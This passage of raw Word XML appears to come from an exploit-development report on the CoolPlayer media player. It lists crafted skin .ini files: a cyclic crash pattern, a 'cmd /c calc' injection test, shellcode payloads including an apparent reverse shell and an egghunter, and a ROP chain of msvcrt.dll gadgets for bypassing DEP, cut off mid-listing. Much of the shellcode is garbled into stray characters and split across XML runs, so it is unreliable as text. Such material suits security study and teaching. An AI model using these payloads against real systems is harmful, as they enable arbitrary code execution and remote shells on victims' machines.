    <w:p w14:paraId="46E4ACC6" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>PlaylistSkin=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lastRenderedPageBreak/>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p>
    <w:p w14:paraId="4DC50BBC" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B60030A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc71564030"/>
      <w:r>
        <w:t>Crashpattern.ini</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="4D616502" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoolPlayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Skin]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6CD76B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>PlaylistSkin=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6690E79B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601206F0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc71564031"/>
      <w:r>
        <w:t>Filtertest.ini</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="2EA11907" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoolPlayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Skin]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7549F456" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PlaylistSkin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /c calc&am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softHyphen/>
        <w:t>#†|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312F7C6E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C5651A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C44175" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc71564032"/>
      <w:r>
        <w:t>Payload.ini</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="040FE306" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoolPlayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Skin]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70851586" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>PlaylistSkin=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âÚÈÙrô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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C97B1CB" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="228C99EE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Ref71481798"/>
      <w:bookmarkStart w:id="99" w:name="_Toc71564033"/>
      <w:r>
        <w:t>Reverseshell.ini</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w14:paraId="06FA097E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoolPlayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Skin]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414AEBEF" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>PlaylistSkin=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lastRenderedPageBreak/>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>‰âÚÈÙ</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ô</w:t>
      </w:r>
      <w:r>
        <w:t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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7249FC66" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B64C753" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc71564034"/>
      <w:r>
        <w:t>Egghunter.ini</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w14:paraId="043F6EC8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoolPlayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Skin]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1089A7E8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>PlaylistSkin=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f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Êÿ</w:t>
      </w:r>
      <w:r>
        <w:t>BRjX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Í</w:t>
      </w:r>
      <w:r>
        <w:t>.&lt;Zt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ï¸</w:t>
      </w:r>
      <w:r>
        <w:t>YEET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>‰×¯</w:t>
      </w:r>
      <w:r>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ê¯</w:t>
      </w:r>
      <w:r>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>çÿç</w:t>
      </w:r>
      <w:r>
        <w:t>YEETYEET‰âÚÈÙrô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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFB1A12" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc71564035"/>
      <w:r>
        <w:t>Ropchain.ini</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w14:paraId="3B23CD27" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoolPlayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Skin]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678215E0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>PlaylistSkin=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lastRenderedPageBreak/>
        <w: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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>‰âÚÈÙ</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ô</w:t>
      </w:r>
      <w:r>
        <w:t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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048E21DF" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="F" w:cs="F"/>
          <w:b/>
          <w:bCs/>
          <w:smallCaps/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc71564036"/>
    </w:p>
    <w:p w14:paraId="5BB62647" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Appendix C</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E74975" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F9FB46" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>create_rop_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>chain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45298A51" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65AC0FC1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>rop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> chain generated with mona.py - www.corelan.be</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E54026" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>rop_gadgets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DAADE6"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_to_set_ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:---]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154E1DF5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ecef,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> POP EBP # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E00BD4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ecef,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> skip 4 bytes [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E32BD53"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_to_set_ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:---]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B95F5FD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c4fa1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>c,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> POP EBX # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230AC6C6" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xffffffff,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7867ED" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c127e</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> INC EBX # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7937F2AB" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c127e</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>5,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> INC EBX # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726588D2"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_to_set_edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:---]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3EE67C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c34de</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> POP EAX # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541D092C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0xa1bf4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>fcd,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> put delta into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (-&gt; put 0x00001000 into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F5CCED" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
